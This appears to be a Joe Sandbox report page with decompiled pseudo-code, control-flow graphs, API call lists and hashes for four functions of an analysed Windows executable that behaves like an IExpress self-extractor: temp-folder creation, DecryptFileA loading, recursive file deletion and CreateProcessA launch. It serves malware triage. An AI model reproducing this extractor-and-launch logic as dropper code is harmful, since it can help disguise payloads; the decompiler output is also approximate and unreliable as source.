                            control_flow_graph 406 eb2f1d-eb2f3d 407 eb2f3f-eb2f46 406->407 408 eb2f6c-eb2f73 call eb5164 406->408 409 eb2f48 call eb51e5 407->409 410 eb2f5f-eb2f66 call eb3a3f 407->410 417 eb2f79-eb2f80 call eb55a0 408->417 418 eb3041 408->418 415 eb2f4d-eb2f4f 409->415 410->408 410->418 415->418 420 eb2f55-eb2f5d 415->420 417->418 425 eb2f86-eb2fbe GetSystemDirectoryA call eb658a LoadLibraryA 417->425 419 eb3043-eb3053 call eb6ce0 418->419 420->408 420->410 428 eb2fc0-eb2fd4 GetProcAddress 425->428 429 eb2ff7-eb3004 FreeLibrary 425->429 428->429 430 eb2fd6-eb2fee DecryptFileA 428->430 431 eb3017-eb3024 SetCurrentDirectoryA 429->431 432 eb3006-eb300c 429->432 430->429 441 eb2ff0-eb2ff5 430->441 434 eb3026-eb303c call eb44b9 call eb6285 431->434 435 eb3054-eb305a 431->435 432->431 433 eb300e call eb621e 432->433 445 eb3013-eb3015 433->445 434->418 437 eb305c call eb3b26 435->437 438 eb3065-eb306c 435->438 448 eb3061-eb3063 437->448 443 eb306e-eb3075 call eb256d 438->443 444 eb307c-eb3089 438->444 441->429 456 eb307a 443->456 450 eb308b-eb3091 444->450 451 eb30a1-eb30a9 444->451 445->418 445->431 448->418 448->438 450->451 452 eb3093 call eb3ba2 450->452 454 eb30ab-eb30ad 451->454 455 eb30b4-eb30b7 451->455 459 eb3098-eb309a 452->459 454->455 458 eb30af call eb4169 454->458 455->419 456->444 458->455 459->418 461 eb309c 459->461 461->451
                            C-Code - Quality: 82%
                            			E00EB2F1D(void* __ecx, int __edx) {
                            				signed int _v8;
                            				char _v272;
                            				_Unknown_base(*)()* _v276;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t9;
                            				void* _t11;
                            				struct HWND__* _t12;
                            				void* _t14;
                            				int _t21;
                            				signed int _t22;
                            				signed int _t25;
                            				intOrPtr* _t26;
                            				signed int _t27;
                            				void* _t30;
                            				_Unknown_base(*)()* _t31;
                            				void* _t34;
                            				struct HINSTANCE__* _t36;
                            				intOrPtr _t41;
                            				intOrPtr* _t44;
                            				signed int _t46;
                            				int _t47;
                            				void* _t58;
                            				void* _t59;
                            
                            				_t43 = __edx;
                            				_t9 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t9 ^ _t46;
                            				if( *0xeb8a38 != 0) {
                            					L5:
                            					_t11 = E00EB5164(_t52);
                            					_t53 = _t11;
                            					if(_t11 == 0) {
                            						L16:
                            						_t12 = 0;
                            						L17:
                            						return E00EB6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                            					}
                            					_t14 = E00EB55A0(_t53); // executed
                            					if(_t14 == 0) {
                            						goto L16;
                            					} else {
                            						_t45 = 0x105;
                            						GetSystemDirectoryA( &_v272, 0x105);
                            						_t43 = 0x105;
                            						_t40 =  &_v272;
                            						E00EB658A( &_v272, 0x105, "advapi32.dll");
                            						_t36 = LoadLibraryA( &_v272);
                            						_t44 = 0;
                            						if(_t36 != 0) {
                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                            							_v276 = _t31;
                            							if(_t31 != 0) {
                            								_t45 = _t47;
                            								_t40 = _t31;
                            								 *0xeba288("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                            								_v276();
                            								if(_t47 != _t47) {
                            									_t40 = 4;
                            									asm("int 0x29");
                            								}
                            							}
                            						}
                            						FreeLibrary(_t36);
                            						_t58 =  *0xeb8a24 - _t44; // 0x0
                            						if(_t58 != 0) {
                            							L14:
                            							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\"); // executed
                            							if(_t21 != 0) {
                            								__eflags =  *0xeb8a2c - _t44; // 0x0
                            								if(__eflags != 0) {
                            									L20:
                            									__eflags =  *0xeb8d48 & 0x000000c0;
                            									if(( *0xeb8d48 & 0x000000c0) == 0) {
                            										_t41 =  *0xeb9a40; // 0x3, executed
                            										_t26 = E00EB256D(_t41); // executed
                            										_t44 = _t26;
                            									}
                            									_t22 =  *0xeb8a24; // 0x0
                            									 *0xeb9a44 = _t44;
                            									__eflags = _t22;
                            									if(_t22 != 0) {
                            										L26:
                            										__eflags =  *0xeb8a38;
                            										if( *0xeb8a38 == 0) {
                            											__eflags = _t22;
                            											if(__eflags == 0) {
                            												E00EB4169(__eflags);
                            											}
                            										}
                            										_t12 = 1;
                            										goto L17;
                            									} else {
                            										__eflags =  *0xeb9a30 - _t22; // 0x0
                            										if(__eflags != 0) {
                            											goto L26;
                            										}
                            										_t25 = E00EB3BA2(); // executed
                            										__eflags = _t25;
                            										if(_t25 == 0) {
                            											goto L16;
                            										}
                            										_t22 =  *0xeb8a24; // 0x0
                            										goto L26;
                            									}
                            								}
                            								_t27 = E00EB3B26(_t40, _t44);
                            								__eflags = _t27;
                            								if(_t27 == 0) {
                            									goto L16;
                            								}
                            								goto L20;
                            							}
                            							_t43 = 0x4bc;
                            							E00EB44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                            							 *0xeb9124 = E00EB6285();
                            							goto L16;
                            						}
                            						_t59 =  *0xeb9a30 - _t44; // 0x0
                            						if(_t59 != 0) {
                            							goto L14;
                            						}
                            						_t30 = E00EB621E(); // executed
                            						if(_t30 == 0) {
                            							goto L16;
                            						}
                            						goto L14;
                            					}
                            				}
                            				_t49 =  *0xeb8a24;
                            				if( *0xeb8a24 != 0) {
                            					L4:
                            					_t34 = E00EB3A3F(_t51);
                            					_t52 = _t34;
                            					if(_t34 == 0) {
                            						goto L16;
                            					}
                            					goto L5;
                            				}
                            				if(E00EB51E5(_t49) == 0) {
                            					goto L16;
                            				}
                            				_t51 =  *0xeb8a38;
                            				if( *0xeb8a38 != 0) {
                            					goto L5;
                            				}
                            				goto L4;
                            			}




























                            0x00eb2f1d
                            0x00eb2f28
                            0x00eb2f2f
                            0x00eb2f3d
                            0x00eb2f6c
                            0x00eb2f6c
                            0x00eb2f71
                            0x00eb2f73
                            0x00eb3041
                            0x00eb3041
                            0x00eb3043
                            0x00eb3053
                            0x00eb3053
                            0x00eb2f79
                            0x00eb2f80
                            0x00000000
                            0x00eb2f86
                            0x00eb2f86
                            0x00eb2f93
                            0x00eb2f9e
                            0x00eb2fa0
                            0x00eb2fa6
                            0x00eb2fb8
                            0x00eb2fba
                            0x00eb2fbe
                            0x00eb2fc6
                            0x00eb2fcc
                            0x00eb2fd4
                            0x00eb2fd6
                            0x00eb2fd8
                            0x00eb2fe0
                            0x00eb2fe6
                            0x00eb2fee
                            0x00eb2ff0
                            0x00eb2ff5
                            0x00eb2ff5
                            0x00eb2fee
                            0x00eb2fd4
                            0x00eb2ff8
                            0x00eb2ffe
                            0x00eb3004
                            0x00eb3017
                            0x00eb301c
                            0x00eb3024
                            0x00eb3054
                            0x00eb305a
                            0x00eb3065
                            0x00eb3065
                            0x00eb306c
                            0x00eb306e
                            0x00eb3075
                            0x00eb307a
                            0x00eb307a
                            0x00eb307c
                            0x00eb3081
                            0x00eb3087
                            0x00eb3089
                            0x00eb30a1
                            0x00eb30a1
                            0x00eb30a9
                            0x00eb30ab
                            0x00eb30ad
                            0x00eb30af
                            0x00eb30af
                            0x00eb30ad
                            0x00eb30b6
                            0x00000000
                            0x00eb308b
                            0x00eb308b
                            0x00eb3091
                            0x00000000
                            0x00000000
                            0x00eb3093
                            0x00eb3098
                            0x00eb309a
                            0x00000000
                            0x00000000
                            0x00eb309c
                            0x00000000
                            0x00eb309c
                            0x00eb3089
                            0x00eb305c
                            0x00eb3061
                            0x00eb3063
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3063
                            0x00eb302b
                            0x00eb3032
                            0x00eb303c
                            0x00000000
                            0x00eb303c
                            0x00eb3006
                            0x00eb300c
                            0x00000000
                            0x00000000
                            0x00eb300e
                            0x00eb3015
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3015
                            0x00eb2f80
                            0x00eb2f3f
                            0x00eb2f46
                            0x00eb2f5f
                            0x00eb2f5f
                            0x00eb2f64
                            0x00eb2f66
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb2f66
                            0x00eb2f4f
                            0x00000000
                            0x00000000
                            0x00eb2f55
                            0x00eb2f5d
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • GetSystemDirectoryA.KERNEL32 ref: 00EB2F93
                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00EB2FB2
                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00EB2FC6
                            • DecryptFileA.ADVAPI32 ref: 00EB2FE6
                            • FreeLibrary.KERNEL32(00000000), ref: 00EB2FF8
                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB301C
                              • Part of subcall function 00EB51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00EB2F4D,?,00000002,00000000), ref: 00EB5201
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                            • API String ID: 2126469477-2712585282
                            • Opcode ID: 4fbcb74fba5398b5f306a2a9a910fb3bea21939da88410096ed5d60ac6503bef
                            • Instruction ID: 6cdb1fc08de00cb1ab1214db4cf95ac0e0d94a1856f018a275a2d202f113ef64
                            • Opcode Fuzzy Hash: 4fbcb74fba5398b5f306a2a9a910fb3bea21939da88410096ed5d60ac6503bef
                            • Instruction Fuzzy Hash: 4C41C931A012058EDB30BB76AD476E773FC9F54758F102269EA41F21A2EF74CE84CA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 478 eb5467-eb5484 479 eb548a-eb5490 call eb53a1 478->479 480 eb551c-eb5528 call eb1680 478->480 483 eb5495-eb5497 479->483 484 eb552d-eb5539 call eb58c8 480->484 485 eb549d-eb54c0 call eb1781 483->485 486 eb5581-eb5583 483->486 493 eb553b-eb5545 CreateDirectoryA 484->493 494 eb554d-eb5552 484->494 495 eb550c-eb551a call eb658a 485->495 496 eb54c2-eb54d8 GetSystemInfo 485->496 489 eb558d-eb559d call eb6ce0 486->489 498 eb5577-eb557c call eb6285 493->498 499 eb5547 493->499 500 eb5585-eb558b 494->500 501 eb5554-eb5557 call eb597d 494->501 495->484 504 eb54da-eb54dd 496->504 505 eb54fe 496->505 498->486 499->494 500->489 511 eb555c-eb555e 501->511 509 eb54df-eb54e2 504->509 510 eb54f7-eb54fc 504->510 512 eb5503-eb5507 call eb658a 505->512 513 eb54f0-eb54f5 509->513 514 eb54e4-eb54e7 509->514 510->512 511->500 515 eb5560-eb5566 511->515 512->495 513->512 514->495 517 eb54e9-eb54ee 514->517 515->486 518 eb5568-eb5575 RemoveDirectoryA 515->518 517->512 518->486
                            C-Code - Quality: 75%
                            			E00EB5467(CHAR* __ecx, void* __edx, char* _a4) {
                            				signed int _v8;
                            				char _v268;
                            				struct _SYSTEM_INFO _v304;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t10;
                            				void* _t13;
                            				intOrPtr _t14;
                            				void* _t16;
                            				void* _t20;
                            				signed int _t26;
                            				void* _t28;
                            				void* _t29;
                            				CHAR* _t48;
                            				signed int _t49;
                            				intOrPtr _t61;
                            
                            				_t10 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t10 ^ _t49;
                            				_push(__ecx);
                            				if(__edx == 0) {
                            					_t48 = 0xeb91e4;
                            					_t42 = 0x104;
                            					E00EB1680(0xeb91e4, 0x104);
                            					L14:
                            					_t13 = E00EB58C8(_t48); // executed
                            					if(_t13 != 0) {
                            						L17:
                            						_t42 = _a4;
                            						if(_a4 == 0) {
                            							L23:
                            							 *0xeb9124 = 0;
                            							_t14 = 1;
                            							L24:
                            							return E00EB6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                            						}
                            						_t16 = E00EB597D(_t48, _t42, 1, 0); // executed
                            						if(_t16 != 0) {
                            							goto L23;
                            						}
                            						_t61 =  *0xeb8a20; // 0x0
                            						if(_t61 != 0) {
                            							 *0xeb8a20 = 0;
                            							RemoveDirectoryA(_t48);
                            						}
                            						L22:
                            						_t14 = 0;
                            						goto L24;
                            					}
                            					if(CreateDirectoryA(_t48, 0) == 0) {
                            						 *0xeb9124 = E00EB6285();
                            						goto L22;
                            					}
                            					 *0xeb8a20 = 1;
                            					goto L17;
                            				}
                            				_t42 =  &_v268;
                            				_t20 = E00EB53A1(__ecx,  &_v268); // executed
                            				if(_t20 == 0) {
                            					goto L22;
                            				}
                            				_push(__ecx);
                            				_t48 = 0xeb91e4;
                            				E00EB1781(0xeb91e4, 0x104, __ecx,  &_v268);
                            				if(( *0xeb9a34 & 0x00000020) == 0) {
                            					L12:
                            					_t42 = 0x104;
                            					E00EB658A(_t48, 0x104, 0xeb1140);
                            					goto L14;
                            				}
                            				GetSystemInfo( &_v304);
                            				_t26 = _v304.dwOemId & 0x0000ffff;
                            				if(_t26 == 0) {
                            					_push("i386");
                            					L11:
                            					E00EB658A(_t48, 0x104);
                            					goto L12;
                            				}
                            				_t28 = _t26 - 1;
                            				if(_t28 == 0) {
                            					_push("mips");
                            					goto L11;
                            				}
                            				_t29 = _t28 - 1;
                            				if(_t29 == 0) {
                            					_push("alpha");
                            					goto L11;
                            				}
                            				if(_t29 != 1) {
                            					goto L12;
                            				}
                            				_push("ppc");
                            				goto L11;
                            			}




















                            0x00eb5472
                            0x00eb5479
                            0x00eb5481
                            0x00eb5484
                            0x00eb551c
                            0x00eb5521
                            0x00eb5528
                            0x00eb552d
                            0x00eb552f
                            0x00eb5539
                            0x00eb554d
                            0x00eb554d
                            0x00eb5552
                            0x00eb5585
                            0x00eb5585
                            0x00eb558b
                            0x00eb558d
                            0x00eb559d
                            0x00eb559d
                            0x00eb5557
                            0x00eb555e
                            0x00000000
                            0x00000000
                            0x00eb5560
                            0x00eb5566
                            0x00eb5569
                            0x00eb556f
                            0x00eb556f
                            0x00eb5581
                            0x00eb5581
                            0x00000000
                            0x00eb5581
                            0x00eb5545
                            0x00eb557c
                            0x00000000
                            0x00eb557c
                            0x00eb5547
                            0x00000000
                            0x00eb5547
                            0x00eb548a
                            0x00eb5490
                            0x00eb5497
                            0x00000000
                            0x00000000
                            0x00eb549d
                            0x00eb54ab
                            0x00eb54b4
                            0x00eb54c0
                            0x00eb550c
                            0x00eb5511
                            0x00eb5515
                            0x00000000
                            0x00eb5515
                            0x00eb54c9
                            0x00eb54d6
                            0x00eb54d8
                            0x00eb54fe
                            0x00eb5503
                            0x00eb5507
                            0x00000000
                            0x00eb5507
                            0x00eb54da
                            0x00eb54dd
                            0x00eb54f7
                            0x00000000
                            0x00eb54f7
                            0x00eb54df
                            0x00eb54e2
                            0x00eb54f0
                            0x00000000
                            0x00eb54f0
                            0x00eb54e7
                            0x00000000
                            0x00000000
                            0x00eb54e9
                            0x00000000

                            APIs
                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB54C9
                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB553D
                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB556F
                              • Part of subcall function 00EB53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB53FB
                              • Part of subcall function 00EB53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5402
                              • Part of subcall function 00EB53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB541F
                              • Part of subcall function 00EB53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB542B
                              • Part of subcall function 00EB53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5434
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                            • API String ID: 1979080616-1143122538
                            • Opcode ID: fc0f66f2974aa09af39510678f4b393497188d7ce381ce98108e30c9c96af0bb
                            • Instruction ID: 504ae8c51178fa33a52d854765b03f31172bbf1104a5c192566bd3713c62ab86
                            • Opcode Fuzzy Hash: fc0f66f2974aa09af39510678f4b393497188d7ce381ce98108e30c9c96af0bb
                            • Instruction Fuzzy Hash: 56313A72B02B055BDB215F2AAD047FF77DFAB81355F08226AA502B2250DB708E058695
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 86%
                            			E00EB2390(CHAR* __ecx) {
                            				signed int _v8;
                            				char _v276;
                            				char _v280;
                            				char _v284;
                            				struct _WIN32_FIND_DATAA _v596;
                            				struct _WIN32_FIND_DATAA _v604;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t21;
                            				int _t36;
                            				void* _t46;
                            				void* _t62;
                            				void* _t63;
                            				CHAR* _t65;
                            				void* _t66;
                            				signed int _t67;
                            				signed int _t69;
                            
                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                            				_t21 =  *0xeb8004; // 0x92ae1240
                            				_t22 = _t21 ^ _t69;
                            				_v8 = _t21 ^ _t69;
                            				_t65 = __ecx;
                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                            					L10:
                            					_pop(_t62);
                            					_pop(_t66);
                            					_pop(_t46);
                            					return E00EB6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                            				} else {
                            					E00EB1680( &_v276, 0x104, __ecx);
                            					_t58 = 0x104;
                            					E00EB16B3( &_v280, 0x104, "*");
                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                            					_t63 = _t22;
                            					if(_t63 == 0xffffffff) {
                            						goto L10;
                            					} else {
                            						goto L3;
                            					}
                            					do {
                            						L3:
                            						_t58 = 0x104;
                            						E00EB1680( &_v276, 0x104, _t65);
                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                            							_t58 = 0x104;
                            							E00EB16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                            							SetFileAttributesA( &_v280, 0x80);
                            							DeleteFileA( &_v280);
                            						} else {
                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                            								E00EB16B3( &_v276, 0x104,  &(_v596.cFileName));
                            								_t58 = 0x104;
                            								E00EB658A( &_v280, 0x104, 0xeb1140);
                            								E00EB2390( &_v284);
                            							}
                            						}
                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                            					} while (_t36 != 0);
                            					FindClose(_t63); // executed
                            					_t22 = RemoveDirectoryA(_t65); // executed
                            					goto L10;
                            				}
                            			}





















                            0x00eb2398
                            0x00eb239e
                            0x00eb23a3
                            0x00eb23a5
                            0x00eb23ae
                            0x00eb23b3
                            0x00eb24cb
                            0x00eb24d2
                            0x00eb24d3
                            0x00eb24d4
                            0x00eb24df
                            0x00eb23c2
                            0x00eb23d1
                            0x00eb23db
                            0x00eb23e4
                            0x00eb23f6
                            0x00eb23fc
                            0x00eb2401
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb2407
                            0x00eb2407
                            0x00eb2408
                            0x00eb2411
                            0x00eb241f
                            0x00eb247a
                            0x00eb2483
                            0x00eb2495
                            0x00eb24a3
                            0x00eb2421
                            0x00eb242f
                            0x00eb2453
                            0x00eb245d
                            0x00eb2466
                            0x00eb2472
                            0x00eb2472
                            0x00eb242f
                            0x00eb24af
                            0x00eb24b5
                            0x00eb24be
                            0x00eb24c5
                            0x00000000
                            0x00eb24c5

                            APIs
                            • FindFirstFileA.KERNELBASE(?,00EB8A3A,00EB11F4,00EB8A3A,00000000,?,?), ref: 00EB23F6
                            • lstrcmpA.KERNEL32(?,00EB11F8), ref: 00EB2427
                            • lstrcmpA.KERNEL32(?,00EB11FC), ref: 00EB243B
                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00EB2495
                            • DeleteFileA.KERNEL32(?), ref: 00EB24A3
                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00EB24AF
                            • FindClose.KERNELBASE(00000000), ref: 00EB24BE
                            • RemoveDirectoryA.KERNELBASE(00EB8A3A), ref: 00EB24C5
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                            • String ID:
                            • API String ID: 836429354-0
                            • Opcode ID: 6422e9bc51a499dbe91e853f0605020e147720dcceaadab68c520a5db614f06a
                            • Instruction ID: 99e4b30c3af6319bc127bbbea207cc234c1054e12fcde0f6563a5e4b6a8c87ee
                            • Opcode Fuzzy Hash: 6422e9bc51a499dbe91e853f0605020e147720dcceaadab68c520a5db614f06a
                            • Instruction Fuzzy Hash: 9331D3316047409FC721EB68CC89AEB73ECAFC4315F041A3DF695A2290EB74990DC792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 631 eb3fef-eb4010 632 eb410a-eb411a call eb6ce0 631->632 633 eb4016-eb403b CreateProcessA 631->633 634 eb4041-eb406e WaitForSingleObject GetExitCodeProcess 633->634 635 eb40c4-eb4101 call eb6285 GetLastError FormatMessageA call eb44b9 633->635 638 eb4091 call eb411b 634->638 639 eb4070-eb4077 634->639 650 eb4106 635->650 645 eb4096-eb40b8 CloseHandle * 2 638->645 639->638 643 eb4079-eb407b 639->643 643->638 644 eb407d-eb4089 643->644 644->638 647 eb408b 644->647 648 eb40ba-eb40c0 645->648 649 eb4108 645->649 647->638 648->649 651 eb40c2 648->651 649->632 650->649 651->650
                            C-Code - Quality: 84%
                            			E00EB3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                            				signed int _v8;
                            				char _v524;
                            				long _v528;
                            				struct _PROCESS_INFORMATION _v544;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t20;
                            				void* _t22;
                            				int _t25;
                            				intOrPtr* _t39;
                            				signed int _t44;
                            				void* _t49;
                            				signed int _t50;
                            				intOrPtr _t53;
                            
                            				_t45 = __edx;
                            				_t20 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t20 ^ _t50;
                            				_t39 = __ecx;
                            				_t49 = 1;
                            				_t22 = 0;
                            				if(__ecx == 0) {
                            					L13:
                            					return E00EB6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                            				}
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                            				if(_t25 == 0) {
                            					 *0xeb9124 = E00EB6285();
                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                            					_t45 = 0x4c4;
                            					E00EB44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                            					L11:
                            					_t49 = 0;
                            					L12:
                            					_t22 = _t49;
                            					goto L13;
                            				}
                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                            				_t44 = _v528;
                            				_t53 =  *0xeb8a28; // 0x0
                            				if(_t53 == 0) {
                            					_t34 =  *0xeb9a2c; // 0x0
                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                            						_t34 = _t44 & 0xff000000;
                            						if((_t44 & 0xff000000) == 0xaa000000) {
                            							 *0xeb9a2c = _t44;
                            						}
                            					}
                            				}
                            				E00EB411B(_t34, _t44);
                            				CloseHandle(_v544.hThread);
                            				CloseHandle(_v544);
                            				if(( *0xeb9a34 & 0x00000400) == 0 || _v528 >= 0) {
                            					goto L12;
                            				} else {
                            					goto L11;
                            				}
                            			}


















                            0x00eb3fef
                            0x00eb3ffa
                            0x00eb4001
                            0x00eb4008
                            0x00eb400a
                            0x00eb400b
                            0x00eb4010
                            0x00eb410a
                            0x00eb411a
                            0x00eb411a
                            0x00eb401c
                            0x00eb401d
                            0x00eb401e
                            0x00eb401f
                            0x00eb4033
                            0x00eb403b
                            0x00eb40ca
                            0x00eb40e9
                            0x00eb40f8
                            0x00eb4101
                            0x00eb4106
                            0x00eb4106
                            0x00eb4108
                            0x00eb4108
                            0x00000000
                            0x00eb4108
                            0x00eb4049
                            0x00eb405c
                            0x00eb4062
                            0x00eb4068
                            0x00eb406e
                            0x00eb4070
                            0x00eb4077
                            0x00eb407f
                            0x00eb4089
                            0x00eb408b
                            0x00eb408b
                            0x00eb4089
                            0x00eb4077
                            0x00eb4091
                            0x00eb409c
                            0x00eb40a8
                            0x00eb40b8
                            0x00000000
                            0x00eb40c2
                            0x00000000
                            0x00eb40c2

                            APIs
                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00EB4033
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EB4049
                            • GetExitCodeProcess.KERNELBASE ref: 00EB405C
                            • CloseHandle.KERNEL32(?), ref: 00EB409C
                            • CloseHandle.KERNEL32(?), ref: 00EB40A8
                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00EB40DC
                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00EB40E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                            • String ID:
                            • API String ID: 3183975587-0
                            • Opcode ID: e319795c6d4f3c029640b171624595927e6124d02a8e3f7367755cc3555b0de3
                            • Instruction ID: 57c285b463f64cd06c286df88b0827d9e43b1c1f91094f7f3c2833864f616599
                            • Opcode Fuzzy Hash: e319795c6d4f3c029640b171624595927e6124d02a8e3f7367755cc3555b0de3
                            • Instruction Fuzzy Hash: 4D31A4B1641218AFEB619F6ADC49FEB77BCEB94704F101269F605F21A2C6304D89CF11
                            Uniqueness

                            Uniqueness Score: -1.00%
